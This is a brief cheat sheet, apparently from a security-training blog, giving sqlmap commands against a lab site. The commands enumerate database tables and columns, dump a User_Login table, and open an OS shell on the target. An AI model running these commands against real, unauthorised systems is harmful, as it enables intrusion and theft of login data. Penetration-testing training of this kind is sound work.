sqlmap

sqlmap is a command line tool to automatize SQL injections.

Examples

Retrieve tables on DB (–tables;)] specify database with -D:
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> -D moviescope --tables

Retrieve columns from a table in DB –columns;
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> -D moviescope -T User_Login --columns

Dump content of a table from DB –dump;
sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> -D moviescope -T User_Login --dump

Gain access to OS shell

sqlmap -u "http://www.moviescope.com/viewprofile.aspx?id=1" --cookie=<"cookie value which you have copied in step #5"> --os-shell

You might also be interested in…

Leave a Reply

Your email address will not be published. Required fields are marked *